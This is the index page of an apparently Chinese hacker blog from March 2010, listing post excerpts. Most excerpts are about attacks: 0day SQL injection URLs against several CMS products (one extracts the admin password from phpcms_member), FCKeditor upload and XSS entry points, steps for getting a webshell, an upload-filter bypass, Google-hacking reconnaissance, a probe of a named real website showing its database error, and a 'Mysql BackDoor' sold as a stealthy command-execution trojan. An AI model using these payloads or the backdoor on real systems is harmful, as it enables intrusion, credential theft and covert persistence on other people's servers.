神刀网

霓虹,乃天空之神,吸取天地之精华,放出自己生命泉源,以致充满神奇色彩!

[置顶] Symbian开发

[置顶] Windows Mobile手机应用开发

[置顶] iphone学习开发大致课程

[置顶] 如何学习开源项目 学习开源代码的思路

[置顶] 我的数据库学习“曲线”

[置顶] 市场需要的信息安全工程师方向

[置顶] Android 3D线上游戏应用开发技术课程大纲

[置顶] 本人小菜学习最近状况0131

[置顶] 如何学好网络安全

[置顶] Android 学习历程 25更新

[置顶] 搭建全能环境的软件AAWServerv5.0

渗透测试工具(老外整理的)

[ At 2010-3-11 By 神刀   0 comments ]

Packet Shaper:
Nemesis: a command line packet shaper
Packit: The Packet Toolkit - A network packet shaper.

More...

Read More...

轻微渗透-陈振肖太极网

[ At 2010-3-11 By 神刀   0 comments ]

http://www.czxtaiji.net/content.php?theMenuId=4&theSubMenuId=1&theArticleId=48'
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in d:\site\bin\sys\config.php on line 930

More...

Read More...

discuz 经典php加密解密函数

[ At 2010-3-11 By 神刀   0 comments ]
  1. // 参数解释   
  2. // $string: 明文 或 密文   
  3. // $operation:DECODE表示解密,其它表示加密   
  4. More...

    Read More...

科讯 v6.5 CMS Oday

[ At 2010-3-11 By 神刀   0 comments ]

科讯 v6.5 CMS Oday
后台:写入网站kesion目录如http://localhost
cookies:登录后抓取到的USER的COOKIS
帐号密码:注册后可以正常登录的用户名密码
验证码:登录时的验证码,抓图后填入

操作,先输入网站,先在网站注册一个正常用户,可以直接写入帐号密码,得到验证码图片后登录后上传,也可以直接用工具抓登录后的 COOKIE,直接点上传得到SHELL

More...

Read More...

Discuz! v7.2 注入漏洞分析与利用

[ At 2010-3-11 By 神刀   0 comments ]

author:toby57    http://hi.baidu.com/toby57/team:www.wolvez.org在最新的discuz! 7.2中自带了一个新的应用程序插件manyou。恰恰在这个新插件中,没有对传入的参数进行检查,在GPC为off的情况下,导致注入漏洞的产生。漏洞分析:文件./manyou/sources/notice.php相关代码:i

More...

Read More...

google hack 渗透过程

[ At 2010-3-10 By 神刀   0 comments ]


利用google完全是可以对一个站点进行信息收集和渗透的,下面我们用google对特定站点进行一次测试。
------------------------------------------------
首先用google先看这个站点的一些基本情况(一些细节部分就略去了):
site:xxxx.com
从返回的信息中,找到几个该校的几个系院的域名:
http//a1.xxxx.com
http//a2.xxxx.com

More...

Read More...

T00ls.net 开放注册两天

[ At 2010-3-10 By 神刀   0 comments ]

近期由于服务器故障。丢失C盘数据。包括数据库。。。所以本站被迫关闭多日。。搬迁至近服务器。
数据回滚至最后一次备份1月5日。。。囧了。对不起各位了。
届时1月5日后所有帖子和用户资料消失。。。1月5日前注册的。未被清理的。用户。可以继续登录。就当大赦天下了把。。。
另外。

开放注册2天,大伙赶快去哦!

偶还是神刀

http://www.t00ls.net/

More...

Read More...

2010年3月10日的文章

[ At 2010-3-10 By 神刀   0 comments ]

请输入密码查看文章及评论. 成功输入密码后, 可以直接点击查看文章, 直到关闭浏览器.
此文章需要更高级别密码!

Read More...

回忆社工小武&helen

[ At 2010-3-10 By 神刀   0 comments ]

这是我在华夏黑客联盟转载的,静流--------华夏黑客联盟的讲师,其BLOG被Helen入侵了,Helen在其博客上改了首页
1.jpg

More...

Read More...

Zoomla!逐浪CMS3.2 0day

[ At 2010-3-10 By 神刀   0 comments ]

北洋贱队(http://bbs.seceye.org)首发 Blog:www.dongxie.org 测试版本: Zoomla!逐浪CMS3.2 + mssql for Windows 描述: Zoomla!逐浪CMS是功能强大的网站内核与管理系统,集成内容管理OASNS项目管理采集邮件订阅等强大功能,基于c#语言.net架构 开发,是目前中国唯一同步支持MSSQL与Oracle两大数据库的高端CMS,用于快速构建高效门户网站 测试方法: ——————————————————————————– 警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! 1.注入漏洞: http://www.site.com/Search/SearchList.aspx?node=0&keyword=1%25′%20Or%20Db_NaMe()=0%20oR%20′%25′=’&type=1 2.FCKeditor上传漏洞 http://www.site.com/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http%3A%2F%2Fwww.site.com%2Feditor%2Ffilemanager%2Fconnectors%2Faspx%2Fconnector.aspx 3.XSS脚本跨站漏洞 http://www.site.com/prompt/correct.aspx?t= 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://www.zoomla.cn/

...Read More...

PHPcms2008 0day

[ At 2010-3-10 By 神刀   0 comments ]

Exploit:

 

/ask/search_ajax.php?q=s%D5'%20or%20(select%20ascii(substring(password,1,1))%20from%20phpcms_member%20where%20username=0x706870636D73)>52%23

More...

Read More...

某教育培训网ODAY

[ At 2010-3-10 By 神刀   0 comments ]

By无晴


出错代码:

<!--#include FILE="upload.inc"-->
<%
dim upload,file,formName,formPath,iCount,fileformat
...

More...

Read More...

上传漏洞 hidden to text 突破手记

[ At 2010-3-9 By 神刀   0 comments ]

文章作者:udb311

本文是由一个上传的页面突破上传引发的,话说当时群里议论纷纷。发出XXX网站的上传地址,研究过来研究过去。没找到突破,本地修改上传提交仍然不能突破。 

就在当时,小三毛同志提出修改hidden to text利用IIS漏洞可取webshell。咱也试下这招数如何

本地构造上传 

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

More...

Read More...

搜一次CMS 0day EXP

[ At 2010-3-9 By 神刀   0 comments ]

 

将以下内容保存为html

...

More...

Read More...

Mysql Door

[ At 2010-3-9 By 神刀   0 comments ]

Mysql BackDoor是一款针对PHP+Mysql服务器开发的后门,后门安装后为Mysql增加一个可以执行系统命令的"state"函数,并且随Mysql进程启动一个基于Dll的嗅探型后门,从而巧妙地实现了无端口,无进程,无服务的穿墙木马.程序在WINXP、WIN2003+MYSQL5.0.X下通过.

[安装]
将Mysql.php传到PHP服务器上,依填上相应的Host、User、Password、DB后,点击"自动安装Mysql BackDoor"

...

More...

Read More...
分页:« 首页...«1[2][3][4][5][6][7][8][9][10][11][12][13][14]»...尾页 »

日历

<< 2010-3 >>

Sun

Mon

Tue

Wed

Thu

Fri

Sat

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

控制面板

最近引用

Search

站点统计

  • 文章总数:1549
  • 评论总数:122
  • 引用总数:0
  • 浏览总数:123249
  • 留言总数:11
  • 当前主题:简单黑白主题
  • 当前样式:black

网站收藏

友情链接

图标汇集

    http://wap.feedsky.com/ni10256 feedsky
    抓虾
    Rojo
    google reader
    netvibes
    my yahoo
    newsgator
    bloglines
    鲜果
    哪吒
    有道
    QQ邮箱
    九点
    抓虾
    Rojo
    google reader
    netvibes
    my yahoo
    newsgator
    bloglines
    鲜果
    哪吒
    有道
    QQ邮箱
    九点

Powered By Z-Blog 1.8 Walle Build 91204 Code detection by Codefense

UNISON UPDATE Auto Publisher Copyright http://www.nhs8.com 神刀网 Some Rights Reserved.粤ICP备06083217号
  • 深圳网警
  • <